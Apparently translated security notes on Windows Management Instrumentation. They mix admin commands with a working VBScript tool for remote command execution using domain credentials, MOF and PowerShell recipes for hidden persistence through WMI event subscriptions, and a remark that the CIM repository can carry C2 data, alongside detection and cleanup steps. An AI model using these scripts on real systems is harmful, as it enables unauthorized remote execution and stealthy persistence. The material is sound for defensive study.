WMI Management Specification

Terminology

  • CIM - Common Information Model. This is the central concept of WBEM; WMI stores its managed-object data (namespaces, classes, methods, properties, etc.) according to this model.
  • CIM Repository - The storage that holds the managed-object data. The structure of the CIM repository is built upon DMTF standards.
  • CIMOM - Common Information Model Object Manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks the available classes and determines which provider is responsible for supplying instances of these classes.
  • DMTF - Distributed Management Task Force. The DMTF consortium was founded in May 1992 by eight companies, including BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp., and Microsoft Corp. Its aim is to define industry standards for management.
  • MIB - Management Information Base. Describes a set of managed objects; each managed object in a MIB has a unique identifier.
  • MOF - Managed Object Format. A text file that contains the class definition of one or more managed objects. These definitions can be exported from and imported into the CIM repository with WMI CIM Studio.
  • Schema - A group of classes that describe a particular management environment.
  • SNMP - Simple Network Management Protocol. An Internet standard defined by the IETF and part of the TCP/IP protocol suite. SNMP is the protocol by which management information travels between management stations and agents. Management information refers to a collection of managed objects that reside in a virtual information store called a Management Information Base (MIB).
  • WBEM - Web-Based Enterprise Management. WBEM covers several DMTF industry standards, including the Common Information Model, and provides a standardized way to access information from the various hardware and software management systems in an enterprise environment.

Protocols

  • DCOM - TCP port 135
  • WinRM - TCP ports 5985 (HTTP) and 5986 (HTTPS)
  • Service - Winmgmt

Test tools

  • wmic.exe
  • wbemtest.exe
  • winrm.exe
  • CIM Studio
  • Powershell

WMIC

List processes

wmic process list brief

Create a process

wmic process call create "notepad.exe"
wmic /node:"hostname" /user:"domain\administrator" /password:"123456" process get name,processid

Terminate a process

wmic process where name="qq.exe" call terminate

Start a service

wmic SERVICE where name="tlntsvr" call startservice

Scheduled tasks

wmic job

Powershell

Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct

// -Credential is a previously created logon credential

Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'notepad.exe' -ComputerName 192.168.6.2 -Credential domain\administrator

WQL

SELECT * FROM Win32_ComputerSystem WHERE NumberOfLogicalProcessors < 2
SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2
SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2

WSH

REMOTE COMMAND EXEC

Sometimes a low-privileged user cannot start the wmic command-line program, yet VBS can still reach the WMI interface.

'VBS
' remote command exec
' cscript wmiexec.vbs 192.168.6.2 domain\administrator 123456 "cmd.exe /c net user > c:\11.txt"
On Error GoTo 0
Dim strComputer
Dim strUser
Dim strPassword
Dim strCommand
Set objArgs = WScript.Arguments
strComputer = objArgs(0)
strUser = objArgs(1)
strPassword = objArgs(2)
strCommand = objArgs(3)
Set objWMIService = CreateObject("WbemScripting.SWbemLocator").ConnectServer(strComputer,"root/cimv2",strUser,strPassword)
' Create process
Set process = objWMIService.Get("Win32_Process")
intReturn = process.Create(strCommand)
If intReturn <>0 then
WScript.Echo "Return value: " & intReturn
WScript.Echo "Access denied (2)" &vbLf & _
"Insufficient privilege (3)" &vbLf & _
"Unknown failure (8)" &vbLf & _
"Path not found (9)" &vbLf & _
"Invalid parameter (21)" &vbLf & _
"Other (22-4294967295)"
Else
Wscript.Echo "Process created."
End If

MOF backdoor

Managed Object Format (MOF) is the original form in which classes and class instances are stored in the WMI database.

Dynamically create a WMI class

$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty',"This is not the malware you're looking for")
$StaticClass.Put()

Create a permanent event subscription

  1. Event Filters - select the events of interest
  2. Event Consumers - the action to perform when the event fires
     __EventConsumer
       LogFileEventConsumer - writes the event data to a specified log file
       ActiveScriptEventConsumer - runs an embedded VBScript or JScript script
       NTEventLogEventConsumer - creates an event log entry containing the event data
       SMTPEventConsumer - sends an e-mail containing the event data
       CommandLineEventConsumer - runs a command-line program
  3. Binding - binds the filter to the consumer
     __FilterToConsumerBinding

Event types

Intrinsic events
Intrinsic events represent the creation, modification, and deletion of any WMI class, object, or namespace. Their class names usually begin with two underscores. Because these events are polled, some may be missed, so the polling interval must be specified in the WITHIN clause of the WQL query.
__InstanceCreationEvent

Extrinsic events
WMI has fewer extrinsic events; they are delivered immediately when the event occurs.
ROOT\CIMV2:Win32_OperatingSystem

Using the extrinsic Win32_ProcessStartTrace event with the creation of LogonUI.exe as the trigger, a specific script or program can be run when a user logs on.
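The two event types above, shown from a monitoring point of view as an added example (not code from the original notes): a temporary, in-memory subscription to a polled intrinsic event in root\subscription, which fires when a new __EventFilter is created, and one to an extrinsic event, which needs no WITHIN clause because the provider delivers it as it happens. The SourceIdentifier names are my own; Win32_ProcessStartTrace requires an elevated session.

```powershell
# Added example, not part of the original notes. Registers two temporary
# (session-scoped) subscriptions with Register-CimIndicationEvent; nothing is
# written to the repository, so they disappear when the session ends.

# Intrinsic event: WMI polls every 5 seconds (WITHIN 5) for a new __EventFilter
# in root\subscription, the namespace where permanent subscriptions are stored.
$intrinsicQuery = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA '__EventFilter'"
Register-CimIndicationEvent -Namespace 'root\subscription' -Query $intrinsicQuery `
    -SourceIdentifier 'NewEventFilter' -Action {
        # TargetInstance is the __EventFilter that was just created.
        $ti = $Event.SourceEventArgs.NewEvent.TargetInstance
        Write-Host ("[{0}] new __EventFilter '{1}' with query: {2}" -f (Get-Date), $ti.Name, $ti.Query)
    } | Out-Null

# Extrinsic event: delivered by the kernel trace provider immediately, so no
# WITHIN clause. Here it reports when the MOF compiler is started.
$extrinsicQuery = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'mofcomp.exe'"
Register-CimIndicationEvent -Namespace 'root\cimv2' -Query $extrinsicQuery `
    -SourceIdentifier 'MofcompStarted' -Action {
        $e = $Event.SourceEventArgs.NewEvent
        Write-Host ("[{0}] mofcomp.exe started, PID {1}, parent PID {2}" -f (Get-Date), $e.ProcessID, $e.ParentProcessID)
    } | Out-Null

# Show the active registrations; remove them with Unregister-Event when done.
Get-EventSubscriber | Select-Object SourceIdentifier, EventName
# Unregister-Event -SourceIdentifier NewEventFilter
# Unregister-Event -SourceIdentifier MofcompStarted
```

Leave the session open and create a filter with one of the Set-WmiInstance snippets from these notes in another window: the intrinsic handler prints within the 5-second polling window, while the extrinsic handler prints the moment mofcomp.exe starts.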

test.mof

https://www.codeproject.com/articles/27914/wmi-mof-basics

#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Consumer
{
Name = "WMI_Mofbackdoor_Test_CL";
RunInteractively=false;
CommandLineTemplate="calc.exe";
};
instance of __EventFilter as $EventFilter
{
Name = "WMI_Mofbackdoor_Test_EF";
EventNamespace = "Root\\Cimv2";
Query ="SELECT * FROM __InstanceCreationEvent Within 5 Where TargetInstance Isa \"Win32_Process\" And Targetinstance.Name = \"notepad.exe\" ";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding {
Filter = $EventFilter;
Consumer = $Consumer;
};

Compile
mofcomp.exe -autorecover test.mof

mofcomp -N:\\[machinename]\root\subscription test.mof

Or
drop the file into the %SystemRoot%\System32\Wbem\MOF folder, where it is compiled and executed automatically.

PowerShell

• Get-WmiObject
• Get-CimAssociatedInstance
• Get-CimClass - Powershell 3.0 CmdLet
• Get-CimInstance
• Get-CimSession
• Set-WmiInstance
• Set-CimInstance
• Invoke-WmiMethod
• Invoke-CimMethod
• New-CimInstance
• New-CimSession
• New-CimSessionOption
• Register-CimIndicationEvent
• Register-WmiEvent
• Remove-CimInstance
• Remove-WmiObject
• Remove-CimSession

Create a boot-time startup event

$filterName='BotFilter82'
$consumerName='BotConsumer23'
$exePath='C:\MyProg.exe'
# Create an __EventFilter
$Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
$WMIEventFilter=Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{
Name=$filterName;
EventNameSpace="root\cimv2";
QueryLanguage="WQL";
Query=$Query} -ErrorAction Stop
# Create a CommandLineEventConsumer
$WMIEventConsumer=Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{
Name=$consumerName;
ExecutablePath=$exePath;
CommandLineTemplate=$exePath}
# Bind the filter to the consumer
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{
Filter=$WMIEventFilter;
Consumer=$WMIEventConsumer
}

Detection

WMI is sometimes used by malware to change the browser home page.

View filters, consumers, and bindings

PowerShell

#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

Using wmic

wmic /namespace:\\root\subscription PATH __EventConsumer get /format:list
wmic /namespace:\\root\subscription PATH __EventFilter get /format:list
wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding get /format:list
wmic /namespace:\\root\subscription PATH __TimerInstruction get /format:list

Cleanup

Powershell

Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='filtP1'" | Remove-WmiObject -Verbose
Get-WmiObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='consP1'" | Remove-WmiObject -Verbose
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

Using wmic

wmic /namespace:\\root\subscription PATH __EventConsumer delete
wmic /namespace:\\root\subscription PATH __EventFilter delete
wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding delete
wmic /namespace:\\root\subscription PATH __TimerInstruction delete

WMI Providers

https://www.codeproject.com/articles/5206/a-simple-guide-to-wmi-providers

Install the provider
Installutil.exe WMIServiceHost.dll

wmic PATH win32_servicehost

Error handling

Register the DLL

regasm "%systemdrive%\program files\reference assemblies\microsoft\framework\v3.5\system.management.instrumentation.dll"

Architecture

namespaces, classes, and objects

Persistent objects are stored in the CIM database under %SystemRoot%\System32\wbem\Repository\, which holds instances of WMI classes, class definitions, and namespace definitions.

Note
1. The CIM database can store arbitrary data
2. It can serve as a C2 channel for transferring data
3. Providers can be created